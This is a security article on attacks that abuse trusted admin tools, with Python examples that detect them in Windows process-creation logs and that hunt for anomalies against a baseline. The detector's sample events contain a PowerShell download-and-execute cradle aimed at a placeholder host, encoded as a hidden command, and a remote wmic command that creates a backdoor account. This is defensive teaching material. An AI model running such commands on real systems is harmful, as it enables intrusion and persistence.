Your IT stack is the enemy: How 84% of attacks evade detection by turning trusted tools against you

In the early hours of a Sunday morning in Los Angeles, a prominent West Coast financial services firm is under attack by a nation-state crew using living-off-the-land (LOTL) tactics. The intrusion targets the firm's cryptocurrency pricing, trading and valuation algorithms for financial gain, and it relies on the tools already installed in the environment, rather than on custom malware, to get in and to move around.

According to CrowdStrike's 2025 Global Threat Report, the majority of modern attacks, including those against the financial sector, are now malware-free. Adversaries exploit valid credentials, remote monitoring and management (RMM) tools and built-in administrative utilities, with breakout times (the interval between initial access and the first lateral movement) as short as about a minute.

Nobody in the SOC or on the security leadership team suspects a thing, yet the signs of an ongoing attack are there for anyone who knows what to look for. The rise in credential theft, business email compromise and zero-day exploitation has created an environment in which LOTL attacks thrive. Bitdefender's recent research finds that 84% of modern attacks use LOTL techniques that bypass traditional detection, and that in nearly one in five cases attackers exfiltrate sensitive data within the first hour of compromise.

LOTL tactics have become the primary method of modern intrusion, with advanced persistent threats (APTs) remaining undetected for extended periods before they exfiltrate data, as IBM's X-Force 2025 Threat Intelligence Index highlights.

The financial impact of these attacks is substantial, with the average cost of ransomware-related downtime estimated at $1.7 million per incident, rising to $2.5 million in the public sector, according to CrowdStrike’s research.

The arsenal of attackers: Your trusted tools

Attackers abuse tools that are already installed and trusted inside the organization, such as PowerShell, Windows Management Instrumentation (WMI), PsExec and similar administrative utilities, to persist inside enterprises and evade detection. Because these tools are signed, widely deployed and used by administrators every day, running them does not stand out the way a dropped malware binary does; unless process-creation auditing with command lines and PowerShell script block logging are enabled, they leave few useful traces, which makes an ongoing attack hard to recognize.
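As an added illustration (not code from the article or from any of the vendors it cites), the following Python script shows what these tools do leave behind once process-creation auditing with command lines is switched on, and how a detection rule reads those records. The event records, host names, user names and the 203.0.113.5 address are constructed for the example; the base64 payload is built inside the script the same way an attacker builds a -EncodedCommand argument (UTF-16LE text, then base64), so the decoder can be checked against a known plaintext.

```python
import base64
import binascii
import re

# Constructed sample records modelled on Windows Security Event ID 4688
# (process creation with "include command line" auditing enabled). Not real
# logs: hosts, users and the 203.0.113.0/24 address are placeholders.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
# How a -EncodedCommand payload is produced: UTF-16LE, then base64.
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii")

EVENTS = [
    {"id": 1, "host": "WS01", "user": "alice", "parent": "explorer.exe",
     "new_process": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"id": 2, "host": "WS07", "user": "bob", "parent": "WINWORD.EXE",
     "new_process": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"id": 3, "host": "FS01", "user": "svc_it", "parent": "WmiPrvSE.exe",
     "new_process": "cmd.exe", "cmdline": "cmd.exe /c whoami /all"},
    {"id": 4, "host": "FS01", "user": "SYSTEM", "parent": "services.exe",
     "new_process": "PSEXESVC.exe", "cmdline": r"C:\Windows\PSEXESVC.exe"},
    {"id": 5, "host": "WS07", "user": "bob", "parent": "cmd.exe",
     "new_process": "wmic.exe",
     "cmdline": 'wmic /node:FS01 process call create "cmd /c net user backdoor P@ss /add"'},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")  # PowerShell encodes the script as UTF-16LE
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(ev):
    """Return the list of LOTL indicators matched by one process-creation event."""
    tags = []
    parent = ev["parent"].lower()
    child = ev["new_process"].lower()
    decoded = decode_encoded_command(ev["cmdline"])
    # Match on the raw command line plus the decoded script, so indicators
    # hidden behind base64 are still visible to the rules below.
    text = ev["cmdline"] + (" " + decoded if decoded else "")

    if decoded is not None:
        tags.append("powershell_encoded")
    if re.search(r"-w[a-z]*\s+hidden", text, re.I):
        tags.append("hidden_window")
    if re.search(r"\b(iex|invoke-expression)\b", text, re.I):
        tags.append("invoke_expression")
    if re.search(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"
                 r"|invoke-restmethod|start-bitstransfer", text, re.I):
        tags.append("download_cradle")
    if parent in OFFICE and child in SHELLS:
        tags.append("office_spawned_shell")
    if parent == "wmiprvse.exe" and child in SHELLS:
        # Remote WMI Win32_Process.Create shows up on the target only like this.
        tags.append("wmi_spawned_process")
    if child == "wmic.exe" and re.search(r"/node:", text, re.I) \
            and re.search(r"process\s+call\s+create", text, re.I):
        tags.append("wmic_remote_exec")
    if child == "psexesvc.exe" or (parent == "services.exe" and "psexesvc" in child):
        tags.append("psexec_service")
    return tags


def scan(events):
    """Map event id -> indicators for every event that matched at least one rule."""
    findings = {}
    for ev in events:
        tags = classify(ev)
        if tags:
            findings[ev["id"]] = tags
    return findings
```

The reason to decode rather than match on the base64 blob is that the actual indicators (IEX, DownloadString, the remote URL) exist only in the plaintext. The parent-process checks cover the opposite case, where the command line itself is innocuous: a remote WMI process-creation call appears on the target only as WmiPrvSE.exe spawning cmd.exe, and PsExec appears as services.exe starting PSEXESVC.exe.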

Threat actors combine LOTL with techniques such as bring your own vulnerable driver (BYOVD) to blind or disable endpoint detection and response (EDR) agents, then conceal their activity inside legitimate system operations. As Gartner notes, the use of common OS tools complicates detection and lets attackers blend in with normal activity.

Ransomware incidents often start with legitimate remote monitoring and management tools being misused, which shows how enterprise IT utilities are weaponized by attackers, as CrowdStrike's ransomware survey reveals.

CrowdStrike's reports underline the shift toward malware-free techniques, with adversaries blending in with legitimate user activity to impede detection. The average breakout time for successful attacks has fallen to 48 minutes, which leaves defenders less than an hour to detect and contain an intrusion before it spreads; understanding their own attack surface and adapting to the evolving threat landscape is the precondition for doing so.

Spotting behavioral clues in plain sight

Adversaries using LOTL techniques are patient and blend into the background, using the same administrative and remote management tools that IT and security teams rely on. Because the attack runs on tools that are already in the network rather than on malware, there is no malicious file for a scanner to find; only the behavior gives the intrusion away, and that is what makes detection hard.

Defenders must learn the attackers' tradecraft and, just as important, know what normal looks like in their own environment, because an anomaly is only recognizable against a baseline: which accounts run PowerShell or PsExec, on which hosts, spawned by which parent processes and at what times. Organizations should adopt zero trust principles, enforce microsegmentation and centralize behavioral analytics to improve their security posture.

Owning your tech stack for security

Organizations must prioritize constant vigilance, zero trust and microsegmentation to combat LOTL attacks effectively. Adopting NIST's Zero Trust Architecture (SP 800-207) as the organizational framework helps mitigate the risks these attacks pose. In practice that means:

  • Limit privileges on all accounts and enforce least-privilege access, including for service and administrative accounts.
  • Implement microsegmentation to confine attackers and limit lateral movement.
  • Harden tool access and monitor usage: enable process-creation auditing with command lines and PowerShell script block logging, remove the PowerShell 2.0 engine, apply constrained language mode through AppLocker or WDAC, and restrict who may run utilities like PowerShell, WMI and PsExec and from which hosts.
  • Adopt NIST zero trust principles to verify identity and device hygiene continuously.
  • Centralize behavioral analytics and logging so that unusual activity is visible across hosts rather than on one endpoint at a time.
  • Deploy adaptive detection mechanisms to hunt for suspicious patterns, such as first-seen parent/child process pairs or a burst of reconnaissance commands from one account.
  • Conduct red team exercises regularly to test defenses against LOTL tradecraft.
  • Increase security awareness and train users on cyber threats.
  • Inventory and update applications, patch vulnerabilities and conduct security audits.
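The earlier point about knowing what normal looks like and the last few bullets above describe one workflow: build a baseline of ordinary tool use, centralize the events, and hunt for deviations and suspicious sequences. As an added example (not the article's own code, nor any vendor's product logic), here it is in Python over constructed process-creation events. All hosts, accounts, timestamps and the tool lists are assumptions for illustration, and the detector generalizes beyond the article's single scenario: the baseline and the reconnaissance-burst check work for any account, host and time window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records, the shape a SIEM might hold after
# normalizing Sysmon Event ID 1 or Security 4688. Hosts, users and times are made up.
HISTORY = [  # a quiet week: what the baseline is learned from
    {"time": "2025-06-02T09:05:00", "host": "WS01", "user": "alice", "parent": "explorer.exe", "child": "powershell.exe"},
    {"time": "2025-06-03T09:07:00", "host": "WS01", "user": "alice", "parent": "explorer.exe", "child": "powershell.exe"},
    {"time": "2025-06-02T22:00:00", "host": "FS01", "user": "svc_backup", "parent": "services.exe", "child": "backupagent.exe"},
    {"time": "2025-06-04T14:30:00", "host": "WS07", "user": "bob", "parent": "explorer.exe", "child": "outlook.exe"},
    {"time": "2025-06-05T10:00:00", "host": "JUMP01", "user": "itadmin", "parent": "cmd.exe", "child": "psexec.exe"},
]

NEW_EVENTS = [  # the Sunday morning in question
    {"time": "2025-06-08T03:12:10", "host": "WS07", "user": "bob", "parent": "WmiPrvSE.exe", "child": "cmd.exe"},
    {"time": "2025-06-08T03:12:25", "host": "WS07", "user": "bob", "parent": "cmd.exe", "child": "whoami.exe"},
    {"time": "2025-06-08T03:13:40", "host": "WS07", "user": "bob", "parent": "cmd.exe", "child": "net.exe"},
    {"time": "2025-06-08T03:14:55", "host": "WS07", "user": "bob", "parent": "cmd.exe", "child": "nltest.exe"},
    {"time": "2025-06-08T03:16:02", "host": "WS07", "user": "bob", "parent": "cmd.exe", "child": "psexec.exe"},
    {"time": "2025-06-08T09:05:00", "host": "WS01", "user": "alice", "parent": "explorer.exe", "child": "powershell.exe"},
]

# Legitimate admin and recon binaries worth tracking per account (assumed lists).
ADMIN_TOOLS = {"powershell.exe", "pwsh.exe", "wmic.exe", "psexec.exe", "net.exe", "nltest.exe",
               "whoami.exe", "quser.exe", "dsquery.exe", "schtasks.exe", "sc.exe", "reg.exe"}
RECON_TOOLS = {"whoami.exe", "net.exe", "nltest.exe", "quser.exe", "dsquery.exe",
               "ipconfig.exe", "systeminfo.exe"}


def build_baseline(history):
    """Learn what normal looks like: parent/child pairs per host and admin tools per account."""
    pairs, user_tools = set(), set()
    for ev in history:
        child = ev["child"].lower()
        pairs.add((ev["host"], ev["parent"].lower(), child))
        if child in ADMIN_TOOLS:
            user_tools.add((ev["user"], child))
    return {"pairs": pairs, "user_tools": user_tools}


def score_event(ev, baseline):
    """Reasons one event deviates from the baseline (an empty list means it looks normal)."""
    parent, child = ev["parent"].lower(), ev["child"].lower()
    reasons = []
    if (ev["host"], parent, child) not in baseline["pairs"]:
        reasons.append(f"first-seen pair {parent} -> {child} on {ev['host']}")
    if child in ADMIN_TOOLS and (ev["user"], child) not in baseline["user_tools"]:
        reasons.append(f"{ev['user']} has never run {child}")
    return reasons


def recon_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Find (host, user) pairs that ran at least `threshold` distinct recon tools inside one window."""
    by_actor = defaultdict(list)
    for ev in events:
        child = ev["child"].lower()
        if child in RECON_TOOLS:
            by_actor[(ev["host"], ev["user"])].append((datetime.fromisoformat(ev["time"]), child))
    bursts = []
    for (host, user), runs in by_actor.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):
            tools = {tool for t, tool in runs[i:] if t - start <= window}
            if len(tools) >= threshold:
                bursts.append({"host": host, "user": user, "start": start.isoformat(),
                               "tools": sorted(tools)})
                break  # one finding per actor is enough to raise an alert
    return bursts


def hunt(history, new_events):
    """Per-event anomaly scoring plus sequence detection over centralized events; returns only findings."""
    baseline = build_baseline(history)
    anomalies = {}
    for ev in new_events:
        reasons = score_event(ev, baseline)
        if reasons:
            anomalies[ev["time"]] = reasons
    return {"anomalies": anomalies, "bursts": recon_bursts(new_events)}
```

Alice's Monday-morning PowerShell session scores nothing because the baseline already contains it; every step of Bob's session on WS07 scores, and the three reconnaissance commands inside three minutes produce a single burst finding on top of the per-event anomalies. None of the binaries involved is malware, which is exactly why a baseline and a sequence view are needed rather than a file signature.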

By taking ownership of their tech stack and implementing robust security measures, organizations can defend against LOTL attacks and safeguard their critical assets.